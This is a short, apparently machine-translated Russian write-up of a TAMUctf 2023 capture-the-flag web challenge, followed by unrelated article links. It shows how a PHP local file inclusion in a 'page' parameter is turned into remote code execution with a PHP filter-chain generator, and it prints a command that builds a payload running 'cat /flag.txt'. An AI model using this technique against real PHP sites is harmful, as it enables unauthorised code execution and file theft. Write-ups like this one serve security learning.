TAMUctf 2023 - запись черного ящика

Этот вызов создан мистером Блейдом.

Мы видим, что он загружает страницу входа с параметром page.

Пронумеруем файлы. Сначала я попробовал admin и использовал кодировщики base64.

Когда мы расшифруем это, мы сможем получить путь к flag.txt.

‹center›
‹h1›‹?php include(‘/flag.txt’); ?›‹/h1›
‹/center›

Я использую https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
для получения RCE.

python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Я скопировал полезную нагрузку в буфер обмена и поместил ее в параметр страницы.

Спасибо за прочтение.

Удачного взлома!

Новые материалы

Не удалось запустить набор тестов

Если вы столкнетесь с ошибками, указанными ниже, пожалуйста, у меня есть решение вашей проблемы. Чтобы исправить это, выполните следующие действия. Не удалось запустить набор тестов ~ /..

Введение в Null в Котлине (часть 1)

Исключение нулевой ссылки — это одна из ловушек во многих языках программирования, которая возникает из-за доступа к члену пустой ссылки . Для вас это может звучать несколько бредово...

Создавайте быстрые веб-сайты с Golang!

Добро пожаловать! Golang — один из моих любимых языков программирования всех времен. Если вы новичок в этом языке, перейдите по ссылке ниже, чтобы узнать о нем больше:

Все еще путаетесь с матрицей путаницы ?? давайте прервем путаницу…..

С помощью нескольких строк кода любой может создать модель машинного обучения (ML), но создание хорошей модели машинного обучения — это совсем другая история. Что я имею в виду, когда говорю,..

Реактивно с RXJS

Реактивно с RXJS Нажмите здесь, чтобы опубликовать эту статью в LinkedIn » Я занимаюсь реактивным программированием почти два года, и мне почти невозможно даже думать без него...

Объекты JavaScript

Объектный литерал , также называемый объектом, может иметь свойства, методы или их комбинации. Свойства — это данные, а методы — это функции; оба вложены в объект и разделены запятыми. В..

Мемоизация в JavaScript

Мемоизация — это метод оптимизации, который сохраняет результаты ресурсоемких вызовов функций и возвращает кэшированный результат, когда одни и те же входные данные появляются снова. Другими..

Метки

Machine Learning JavaScript Data Science Artificial Intelligence Software Development Web Development Python Coding Deep Learning AI React Software Engineering Nodejs Development Data Java NLP Typescript Front End Development Tutorial Learning Productivity CSS Angular ChatGPT Programming Languages Algorithms Tech Neural Networks Developer Computer Science ES6 Python Programming Javascript Development Cybersecurity HTML Data Analysis Self Improvement